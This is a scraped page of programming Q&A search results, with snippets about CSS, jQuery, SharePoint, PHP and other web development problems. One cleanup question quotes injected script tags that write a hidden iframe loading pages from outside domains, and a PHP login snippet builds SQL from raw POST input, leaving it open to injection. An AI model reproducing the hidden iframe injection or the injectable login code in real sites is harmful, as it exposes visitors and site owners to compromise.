Search Results

Search found 29495 results on 1180 pages for 'cross site scripting'.

Page 1099/1180 | < Previous Page | 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106  | Next Page >

• Added a Facebook badge, throwing off footer placement

  - by Kevin

  Added the for the facebook badge to the site and now it's thrown my placement for the footer off .. it's working fine in Chrome, but IE, FFox and Opera all experiencing problems... Here is a screenshot: The footer (brown bar) is supposed to be at the bottom... Here is the CSS : /* footer */ #footer{ background:url(../images/bg-footer.png) no-repeat; height:26px; overflow:hidden; padding:35px 0 0 55px; font-size:11px; } #footer p{ margin:0; display:inline; color:#766623; } #footer ul{ margin:0; padding:0; list-style:none; display:inline; } #footer li{ display:inline; background:url(../images/sep-f-nav.gif) no-repeat 100% 55%; padding:0 6px 0 0; position:relative; } * html #footer li{ padding:0 3px 0 3px; } *+html #footer li{ padding:0 3px 0 3px; } #footer a{ color:#30481f; text-decoration:none; } #footer a:hover{ text-decoration:underline; /*Facebook badge Holder*/ .fb-area{ width:287px; padding:0 0; margin:0 0; min-height:100%; }

  Read the article

• MySQL + Joomla + remote c# access

  - by Jimmy

  Hello, I work on a Joomla web site, installed on a MySQL database and running on IIS7. It's all working fine. I now need to add functionality that lets (Joomla-)registered users change some configuration data. Though I haven't done this yet, it looks straightforward enough to do with Joomla. The data is private so all external access will be done through HTTPS. I also need an existing c# program, running on another machine, to read that configuration data. Sure enough, this data access needs to be as fast as possible. The data will be small (and filtered by query), but the latency should be kept to a minimum. A short-term, client-side cache (less than a minute, in case a user updates his configuration data) seems like a good idea. I have done practically zero database/asp programming so far, so what's the best way of doing that last step? Should the c# program access the database 'directly' (using what? LINQ?) or setup some sort of Facade (SOAP?) service? If a service should be used, should it be done through Joomla or with ASP on IIS? Thanks

  Read the article

• jQuery script works in Firefox but not in IE. Why am I not surprised?

  - by Ben Tew

  I'm working with the context of a CMS system and trying to turn seperate div's into tabs. You can see it at http://www.wtvynews4.com/test I've kludged together some code from a tutorial site. <script charset="utf-8" type="text/javascript"> jQuery(function() { //When page loads... $("div[ondblclick$='87119417']").attr("id", "87119417"); $("div[ondblclick$='87119482']").attr("id", "87119482"); $("div[ondblclick$='87119672']").attr("id", "87119672"); $("div[ondblclick$='87119727']").attr("id", "87119727"); $("div[ondblclick$='87119812']").attr("id", "87119812"); $("div[ondblclick$='87119417']").addClass("tab_content"); $("div[ondblclick$='87119482']").addClass("tab_content"); $("div[ondblclick$='87119672']").addClass("tab_content"); $("div[ondblclick$='87119727']").addClass("tab_content"); $("div[ondblclick$='87119812']").addClass("tab_content"); $(".tab_content").hide(); //Hide all content $("ul.morenewstabs li:first").addClass("active").show(); //Activate first tab $(".tab_content:first").show(); //Show first tab content //On Click Event $("ul.morenewstabs li").click(function() { $("ul.morenewstabs li").removeClass("active"); //Remove any "active" class $(this).addClass("active"); //Add "active" class to selected tab $(".tab_content").hide(); //Hide all tab content var activeTab = $(this).find("a").attr("href"); //Find the href attribute value to identify the active tab + content $(activeTab).show(); //Fade in the active ID content return false; }); }); </script> Everything works fine in Firefox but not IE. can you provide any assistance? When the page loads the attribute ID's and classes aren't assigned. I tried changing jQuery(function() { to $(document).ready(function() still no luck.

  Read the article

• ActionListener isn't Implementing

  - by Nick Gibson

  JFrameWithPanel is not abstract and does not override abstract method actionPerformed(java.awt.event.ActionEvent) in java.awt.event.ActionListener public class JFrameWithPanel extends JFrame implements ActionListener I Don't get this code. Book and Java site tells me this is the syntax for the method, but again this error shows up constantly. import javax.swing.*; import javax.swing.JOptionPane; import java.awt.*; import java.awt.event.*; import java.lang.Math.*; import java.lang.Integer.*; import java.util.*; import java.util.Random; import java.io.*; import java.text.*; import java.text.DecimalFormat.*; public class JFrameWithPanel extends JFrame implements ActionListener { JButton button = new JButton("Exit"); public JFrameWithPanel() { super("JFrame with Panel"); JComboBox packageChoice = new JComboBox(); packageChoice.addItem("A+ Certification"); packageChoice.addItem("Network+ Certification "); packageChoice.addItem("Security+ Certifictation"); packageChoice.addItem("CIT Full Test Package"); packageChoice.addActionListener(this); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); JPanel pane = new JPanel(); pane.add(button); pane.add(packageChoice); setContentPane(pane); setSize(200,100); setVisible(true); } } then later public class CreateJFrameWithPanel { public static void main(String[] args) { JFrameWithPanel panel = new JFrameWithPanel(); } }

  Read the article

• Ouch, how to escape this in sed? Cleaning up iframe malware

  - by user1769783

  I'm helping someone clean up a malware infection on a site and I'm having a difficult time correctly matching some strings in sed so I can create a script to mass search and replace / remove it. The strings are: <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script> <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://vidintex.com/includes/class.pop.php"></iframe></div>');</script> <script>document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.iws-leipzig.de/contacts.php"></iframe></div>');</script> I cant seem to figure out how to escape the various characters in those lines... If I try to just say delete the entire line if it matches http://vidintex.com/includes/class.pop.php it also deletes the closing "" in the .html files as well. Any help would be greatly appreciated!

  Read the article

• Getting the Item Count of a large sharepoint list in fastest way

  - by sooraj

  I am trying to get the count of the items in a sharepoint document library programatically. The scale I am working with is 30-70000 items. We have usercontrol in a smartpart to display the count . Ours is a TEAM site. This is the code to get the total count SPList VoulnterrList = web.Lists[ListTitle]; SPQuery query = new SPQuery(); query.ViewAttributes = "Scope=\"Recursive\""; string queries = "<Where><Eq><FieldRef Name='ApprovalStatus' /><Value Type='Choice'>Pending</Value></Eq></Where>"; query.Query = queries; SPListItemCollection lstitemcollAssoID = VoulnterrList.GetItems(query); lblCount.Text = "Total Proofs: " + VoulnterrList.Items.Count.ToString() + " Pending Proofs: " + lstitemcollAssoID.Count.ToString(); The problem is this has serious performance issue it takes 75 to 80 sec to load the page. if we comment this page load will decrees to 4 sec. Any better approch for this problem Ours is sharepoint 2007

  Read the article

• How can i test my TSQL syntax?

  - by acidzombie24

  Quick question: How do i get some kind of database to use to test my sql syntax and create basic data. I have Sqlite Code which i'll soon put on a server. I have sql server 2008 installed with visual studio 2010. I tried connecting to the database and had no luck. I also tried using a .mdf file instead thinking its a file and i wont have connectivity issues. Wrong, i still couldnt connect and i used this site to help me (i'm aware its 2005) In that case i used var conn = new SqlConnection(@"Server=.\SQLExpress;AttachDbFilename=C:\dev\src\test\SQL_DB_VS_Test\test.mdf;Database=dbo;Trusted_Connection=Yes;"); exception Unable to open the physical file "C:\dev\src\test\SQL_DB_VS_Test\test.mdf". Operating system error 5: "5(Access is denied.)". Cannot attach the file 'C:\dev\src\test\SQL_DB_VS_Test\test.mdf' as database 'dbo'. with trusted = no i get Login failed for user ''. (What user am i suppose to set...). I created the .mdf with visual studio somehow.

  Read the article

• How do I format a Uri when binding an Image in Silverlight?

  - by Scott

  I haven't been able to find an answer to this. I have a database that has image paths in it ("images/myimage.jpg"). These images exist on my asp.net site which is also where I host the SL. I want to bind these images to my ListBox control so that the image displays. I have read that since I have a string value, "images/myimage.jpg", that I need to convert it to a BitMap image. I have done this: the xaml: <Image Source="{Binding ImageFile, Converter={StaticResource ImageConverter}}"/> the ImageConverter class: public object Convert(object value, Type targetType, object parameter, CultureInfo culture) { try { Uri source= new Uri(value.ToString()); return new BitmapImage(source); } catch(Exception ex) { return new BitmapImage(); } } I get an error when creating the Uri, "The Format of the URI could not be determined". What am I doing wrong? If I create a Uri that looks like this: http://localhost:49723/images/myimage.jpg, it works just fine. Why doesn't just "images/myimage.jpg" work?

  Read the article

• Synfony2 validation changes invalid integer to 0

  - by Craig

  I've added validation to a form and found that in some cases it is losing the invalid data I am feeding it and saving 0s instead. The output at the bottom shows that if I post the latitude as 'zzzzzz' (clearly not a number nor between -90 and 90) the form is declared as valid and saved with the value 0 How can that happen given that I have declared the input must be a number? ProxyType.php buildForm() $builder ->add('siteName', null, array('label' => 'Site name')) .... ->add('latitude', 'number', array('label' => 'Latitude')) ->add('longitude', 'number', array('label' => 'Longitude')) .... ; ProxyController.php createAction .... $postData = $request->request->get('niwa_pictbundle_proxytype'); $this->get('logger')->info('Posted latitude = '.$postData['latitude']); $form = $this->createForm(new ProxyType(), $entity); $form->bindRequest($request); if ($form->isValid()) { $this->get('logger')->info('Form declared valid : latlong ('.$entity->getLatitude().','.$entity->getLongitude().')'); .... validation.yml Acme\PictBundle\Entity\Proxy: properties: longitude: - Min: { limit: -180 } - Max: { limit: 180 } latitude: - Max: { limit: 90 } - Min: { limit: -90 } Output [2012-09-28 02:05:30] app.INFO: Posted latitude = zzzzzz [] [] [2012-09-28 02:05:30] app.INFO: Form declared valid : latlong (0,0) [] []

  Read the article

• SQL Server query

  - by carrot_programmer_3

  Hi, I have a SQL Server DB containing a registrations table that I need to plot on a graph over time. The issue is that I need to break this down by where the user registered from (e.g. website, wap site, or a mobile application). the resulting output data should look like this... [date] [num_reg_website] [num_reg_wap_site] [num_reg_mobileapp] 1 FEB 2010,24,35,64 2 FEB 2010,23,85,48 3 FEB 2010,29,37,79 etc... The source table is as follows... UUID(int), signupdate(datetime), requestsource(varchar(50)) some smple data in this table looks like this... 1001,2010-02-2:00:12:12,'website' 1002,2010-02-2:00:10:17,'app' 1003,2010-02-3:00:14:19,'website' 1004,2010-02-4:00:16:18,'wap' 1005,2010-02-4:00:18:16,'website' Running the following query returns one data column 'total registrations' for the website registrations but I'm not sure how to do this for multiple columns unfortunatly.... select CAST(FLOOR(CAST([signupdate]AS FLOAT ))AS DATETIME) as [signupdate], count(UUID) as 'total registrations' FROM [UserRegistrationRequests] WHERE requestsource = 'website' group by CAST(FLOOR(CAST([signupdate]AS FLOAT ))AS DATETIME)

  Read the article

• How can I parse_url in PHP when there is a URL in a string variable?

  - by Eric O

  I am admittedly a PHP newbie, so I need some help. I am creating a self-designed affiliate program for my site and have the option for an affiliate to add a SubID to their link for tracking. Without having control over what is entered, I have been testing different scenarios and found a bug when a full URL is entered (i.e. "http://example.com"). In my PHP I can grab the variable from the string no problem. My problem comes from when I get the referring URL and parse it (since I need to parse the referring URL to get the host mane for other uses). Code below: $refURL = getenv("HTTP_REFERER"); $parseRefURL = parse_url($refURL); WORKS when incoming link is (for example): http://example.com/?ref=REFERRER'S-ID&sid=www.test.com ERROR when incoming link is (notice the addition of "http://" after "sid="): http://example.com/?ref=REFERRER'S-ID&sid=http://www.test.com Here is the warning message: Warning: parse_url(/?ref=REFERRER'S-ID&sid=http://www.test.com) [function.parse-url]: Unable to parse url in /home4/'directory'/public_html/hosterdoodle/header.php on line 28 Any ideas on how to keep the parse-url function from being thrown off when someone may decide to place a URL in a variable? (I actually tested this problem down to the point that it will throw the error with as little as ":/" in the variable)

  Read the article

• Better way to download a binary file?

  - by geoff

  I have a site where a user can download a file. Some files are extremely large (the largest being 323 MB). When I test it to try and download this file I get an out of memory exception. The only way I know to download the file is below. The reason I'm using the code below is because the URL is encoded and I can't let the user link directly to the file. Is there another way to download this file without having to read the whole thing into a byte array? FileStream fs = new FileStream(context.Server.MapPath(url), FileMode.Open, FileAccess.Read); BinaryReader br = new BinaryReader(fs); long numBytes = new FileInfo(context.Server.MapPath(url)).Length; byte[] bytes = br.ReadBytes((int) numBytes); string filename = Path.GetFileName(url); context.Response.Buffer = true; context.Response.Charset = ""; context.Response.Cache.SetCacheability(HttpCacheability.NoCache); context.Response.ContentType = "application/x-rar-compressed"; context.Response.AddHeader("content-disposition", "attachment;filename=" + filename); context.Response.BinaryWrite(bytes); context.Response.Flush(); context.Response.End();

  Read the article

• How do I migrate from a basic plaintext password authentication to an OAuth based system?

  - by different

  Hello, Found out today that Twitter will be discontinuing its basic authentication for its API; the push is now towards OAuth but I don’t have a clue as to how to use it or whether it’s the right path for me. All I want to be able to do is post a tweet linking to the most recently published post when I hit publish. Currently I’m sending the login credentials for my Twitter account as plaintext, which I realise isn’t that secure but as my site is fairly small it isn’t an issue at least for now. I’m using this basic PHP code: $status = urlencode(stripslashes(urldecode("Test tweet"))); $tweetUrl = 'http://www.twitter.com/statuses/update.xml'; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, "$tweetUrl"); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, "status=$status"); curl_setopt($curl, CURLOPT_USERPWD, "$username:$password"); $result = curl_exec($curl); $resultArray = curl_getinfo($curl); if ($resultArray['http_code'] == 200) { curl_close($curl); $this->redirect(""); } else { curl_close($curl); echo 'Could not post to Twitter. Please go back and try again.'; } How do I move from this to an OAuth system? Do I need to?

  Read the article

• Use CSS3 nth-child to alternate the float of images within DIV tags...

  - by Aaron Rodgers

  Basically, what I'm trying to create is a page of div tags, each has an image inside them and I'm trying to use CSS3's nth-child to alternate the float of that specific image. But for the life of me, I can't get the nth-child to locate those images. Here is my code so far... CSS .featureBlock img:nth-of-type(even) { float: left; } .featureBlock img:nth-of-type(odd) { float: right; } This is the HTML of one of those div tags.... <div class="featureBlock"> <h1>Multisize Players</h1> <div class="featureHelpBlock"><a href="#">More help with this</a></div> <img src="http://office2.vzaar.com/images/features/ft_multisize_players.png"> <span class="featureContent"><p>A variety of player sizes is important as we recognise the fact that no two videos or websites are ever the same and you will want something that suits your site&#8217;s look. So if you record your video in 4x3 (not widescreen) or 16x9 (widescreen) we have the range of player sizes to suit your exact needs.</p> <p>We encode the video at the time of uploading in the size that you choose so that the picture and sound quality is retained throughout. Users can choose from the following sizes:</p></span> <br style="clear:both"> </div> Hope this makes sense...

  Read the article

• selenium and firefox timeout behavior

  - by Md. Reazul Karim

  I am facing this strange timeout behavior. I tried to load some page using: WebDriver drv = new FirefoxDriver(); drv.manage().timeouts().implicitlyWait(10, TimeUnit.SECONDS); drv.get(url); String email = ""; try { WebElement aElem = Util.safeFindElementByXpath(drv, "//p[1]/a[1]"); if (aElem != null) { email = aElem.getAttribute("href"); } } catch (Exception e) { } drv.quit(); return email; The safeFindElementByXpath is: static WebElement safeFindElementByXpath(WebDriver driver, String xpath) { try { return driver.findElement(By.xpath(xpath)); } catch (NoSuchElementException e) { return null; } } Now I set the firefox network.http.connection-timeout and network.http.connection-retry-timeout both to 10. Now if I restart the firefox I can see the new values. But if I try to run the above code - the firefox window opens and it waits for a particular website for a long time. Hence I open another tab in the same firefox window and check the values of timeout and find them to be 90 and 250. If I change the values on that same window, the selenium code immediately finishes requesting for the page (ie it goes after the exception block). So the thing is that the same code will work on many sites and I don't know beforehand which site is invalid/down and I was thinking of putting this code in a separate thread and kill the thread after some time from the calling thread. But that is not possible I guess because the child thread has no way to poll anything as it is stuck at page request and can't go to the polling code afterwards. Now the thing is that I want any kind of hack/workaround to accomplish this: try getting the emails for good sites and if there are bad sites just give up after a certain period (press the panic button sorta thing). Thanks

  Read the article

• How can you pass an object from the form_for helper to a method?

  - by Alex

  So let's say I have a form which is being sent somewhere strange (and by strange we mean, NOT the default route: <% form_for @form_object, :url => {:controller => 'application', :action => 'form_action_thing'} do |f| %> <%= f.text_field :email %> <%= submit_tag 'Login' %> <% end %> Now let's say that we have the method that accepts it. def form_action_thing User.find(????? :email ?????) end My questions are thus: How does can I make the object @form_object available to the receiving method (in this case, form_action_tag)? I've tried params[:form_object], and I've scoured this site and the API, which I have to post below because SO doesn't believe I'm not a spammer (I'm a new member), as well as Googled as many permutations of this idea as I could think of. Nothing. Sorry if I missed something, i'm really trying. How do I address the object, once I've made it accessible to the method? Not params[:form_object], I'm guessing.

  Read the article

• Home based business would like customers to schedule via website the time, day and date they want to take a class.

  - by Alessandro Machi

  I'm using google blogger. I want to ad thumbnail images of different classes I will be offering in my home film/video/sound/lighting studio. The idea is the prospective student visits my website, sees a class they want to take, clicks the thumbnail so first read a descriptive article about the class, at which point they can schedule the class for the time, day, and date of their choosing between the hours of 5am to 9pm, 365 days a year. As soon as the student has inputed the time, day and date of the class they want, they would go to a check out page to purchase the class time. The student would then be sent an email confirmation along with the exact location, the class name, and the time and date they selected. I was thinking of using Dwolla for the check out page because Dwolla offers either no fee or 25 cents per payment transaction, but I'm not sure I can hook up to them easily enough. My blog site is not finished by a longshot. I still have to actually input all of the class thumbnail images along with descriptions, but if you need to see what the page looks like the web address is http://www.myalexlogic.com Google blogger allows for third party code to be added within movable gadgets.

  Read the article

• ASP.NET DynamicData: Whats happening during an update?

  - by Jens A.

  I am using ASP.NET DynamicData (based on LINQ to SQL) on my site for basic scaffolding. On one table I have added additional properties, that are not stored in the table, but are retrieved from somewhere else. (Profile information for a user account, in this case). They are displayed just fine, but when editing these values and pressing "Update", they are not changed. Here's what the properties look like, the table is the standard aspnet_Users table: public String Address { get { UserProfile profile = UserProfile.GetUserProfile(UserName); return profile.Address; } set { UserProfile profile = UserProfile.GetUserProfile(UserName); profile.Address = value; profile.Save(); } } When I fired up the debugger, I've noticed that for each update the set accessor is called three times. Once with the new value, but on a newly created instance of user, then once with the old value, again on an new instance, and finally with the old value on the existing instance. Wondering a bit, I checked with the properties created by the designer, and they, too, are called three times in (almost) the same fashion. The only difference is, that the last call contains the new value for the property. I am a bit stumped here. Why three times, and why are my new properties behaving differently? I'd be grateful for any help on that matter! =)

  Read the article

• Google Sites API - File Cabinets: Spaces and extension separator (.) are removed from file names

  - by user1299447

  We have a series of internal reports that we update regularly from our internal databases. We built an application in C# that uploads these reports to a Google Site. Everything works fine, except that the name of the file shown to the final user in the File Cabinet does not include the original spaces nor the extension separator (.) For example, Stock per warehouse.pdf is shown as : Stockperwarehousepdf Below is a simplified version of the code. private AtomEntry UploadAttachment(string filename, AtomEntry parent, string title, string description) { SiteEntry entry = new SiteEntry(); AtomCategory category = new AtomCategory(SitesService.ATTACHMENT_TERM, SitesService.KIND_SCHEME); category.Label = "attachment"; entry.Categories.Add(category); AtomLink parentLink = new AtomLink(AtomLink.ATOM_TYPE, SitesService.PARENT_REL); parentLink.HRef = parent.SelfUri; entry.Links.Add(parentLink); entry.MediaSource = new MediaFileSource(filename, MediaFileSource.GetContentTypeForFileName(filename)); entry.Content.Type = MediaFileSource.GetContentTypeForFileName(filename); entry.Title.Text= title; entry.Summary.Text = description; AtomEntry newEntry = null; newEntry = service.Insert(new Uri(makeFeedUri("content")), entry); } The key line is where the MediaFileSource object is created. Any idea of what we are missing? I've tried all sort of changes :(

  Read the article

• Running an application from an USB device...

  - by Workshop Alex

  I'm working on a proof-of-concept application, containing a WCF service with console host and client, both on a single USB device. On the same device I will also have the client application which will connect to this service. The service uses the entity framework to connect to the database, which in this POC will just return a list of names. If it works, it will be used for a larger project. Creating the client and service was easy and this works well from USB. But getting the service to connect to the database isn't. I've found this site, suggesting that I should modify machine.config but that stops the XCopy deployment. This project cannot change any setting of the PC, so this suggestion is bad. I cannot create a deployment setup either. The whole thing just needs to run from USB disk. So, how do I get it to run? (The service just selects a list of names from the database, which it returns to the client. If this POC works, it will do far more complex things!)

  Read the article

• Using a CNAME with Shared Windows Azure Website

  - by user1679021

  I've been following instructions on the Azure site to add a CNAME to point to my Azure website. I have had some problems getting it to work and there seems to be some contradictory information in some of the posts. I have my website running in "Shared" mode, which according to the Azure instructions supports custom domains and indeed it seems to allow me to manage domains. But some posts seem to indicate that I have to run in reserved mode. Can anyone confirm this? Also, some posts seem to indicate that I need to add the CNAME in the Azure management portal, but I cannot find where this is. Any help appreciated? I don't really understand A records and CNAME that well. My DNS provider allows me to add both. Do I need to change both? Currently my A record points the "root" to the IP address that Azure gives me and the CNAME points www.mydomain to the Azure website host mysite.azurewebsites.net. I have left them for a while to propogate and nothing seem to happen.

  Read the article

• Windows "forms" authentication - <deny users="?"> redirecting to foreign page!

  - by Erik5388

  Like the title states - I have a web.config file that looks like, <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.web> <compilation debug="true" targetFramework="4.0" /> <authentication mode="Forms"> <forms name="login" protection="All" timeout="30" loginUrl="login" defaultUrl="~/"> <credentials passwordFormat="Clear"> <user name="admin" password="password" /> </credentials> </forms> </authentication> <authorization> <deny users="?" /> </authorization> </system.web> </configuration> I want to do exactly what it says it should do... I want to deny all users who try to enter the site. It works however, it redirects to a "Account/Login?ReturnUrl=%2flogin" url I have never heard of... Is there a place I can change this?

  Read the article

• PHP Session doesn't get read in next page after login validation, Why?

  - by NetStar

  I have a web site and when my users login it takes them to verify.php (where it connects to the DataBase and matches email and password to the user input and if OK puts client data into sessions and take the client to /memberarea/index.php ELSE back to login page with message "Invalid Email or password!") <?php ob_start(); session_start(); $email=$_POST['email']; $pass=md5($_POST['pass']); include("conn.php"); // connects to Database $sql="SELECT * FROM `user` WHERE email='$email' AND pass='$pass'"; $result=mysql_query($sql); $new=mysql_fetch_array($result); $_SESSION['fname']=$new['fname']; $_SESSION['lname']=$new['lname']; $_SESSION['email1']=$new['email1']; $_SESSION['passwrd']=$new['passwrd']; $no=mysql_num_rows($result); if ($no==1){ header('Location:memberarea/index.php'); }else { header("Location:login.php?m=$msg"); //msg="Invalid Login" } ?> then after email id and password is verified it takes them to ` /memberarea/index.php (This is where the problem happens.) where in index.php it checks if a session has been created in-order to block hackers to enter member area and sends them back to the login page. <? session_start(); isset($_SESSION['email'])` && `isset($_SESSION['passwrd'])` The problem is the client gets verified in verify.php (the code is above) In varify.php only after I put ob_start(); ontop of session_start(); It moves on to /memberarea/index.php , If I remove ob_start() It keeps the client on the verify.php page and displays error header is alredy SENT. after I put ob_start() it goes in to /memberarea/index.php but the session is blank, so it goes back to the login page and displays the error ($msg) "Invalid Login" which I programed to display. Can anyone tell me why the session cant pass values from verify.php to /memberarea/index.php

  Read the article

• validation before ajax form submission

  - by ZX12R

  How do i introduce validation before remote_form_for submits? I have javascript function called validateForm(). I am able to call it before the AJAX request process. I tried to use return false and event.preventDefault. But there seems to be no effect. Here is what my code looks like <% remote_form_for :customer, :update =>"uxScreenLoaderDiv", :url => {:action => "login", :controller => "site"}, :html => {:id => "uxLoginForm"}, :onsubmit => "validateForm(event)" do |f| %> User name : <%= f.text_field "uxUserName", :class => "TextBox", :style => "width:100px;" %>&nbsp;* &nbsp;Password : <%= f.password_field "uxPassword", :class => "TextBox", :style => "width:100px;" %>&nbsp;* <%= f.submit "Go!", :class => "Button-Simple", :id => "uxSubmitButton" %> <% end %> the javascript function is simple as follows function validateForm(event){ return false; //event.preventDefault(); }

  Read the article

• Best Practices For Secure APIs?

  - by Ferrett Steinmetz

  Let's say I have a website that has a lot of information on our products. I'd like some of our customers (including us!) to be able to look up our products for various methods, including: 1) Pulling data from AJAX calls that return data in cool, JavaScripty-ways 2) Creating iPhone applications that use that data; 3) Having other web applications use that data for their own end. Normally, I'd just create an API and be done with it. However, this data is in fact mildly confidential - which is to say that we don't want our competitors to be able to look up all our products every morning and then automatically set their prices to undercut us. And we also want to be able to look at who might be abusing the system, so if someone's making ten million complex calls to our API a day and bogging down our server, we can cut them off. My next logical step would be then to create a developers' key to restrict access - which would work fine for web apps, but not so much for any AJAX calls. (As I see it, they'd need to provide the key in the JavaScript, which is in plaintext and easily seen, and hence there's actually no security at all. Particularly if we'd be using our own developers' keys on our site to make these AJAX calls.) So my question: after looking around at Oauth and OpenID for some time, I'm not sure there is a solution that would handle all three of the above. Is there some sort of canonical "best practices" for developers' keys, or can Oauth and OpenID handle AJAX calls easily in some fashion I have yet to grok, or am I missing something entirely?

  Read the article

< Previous Page | 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106  | Next Page >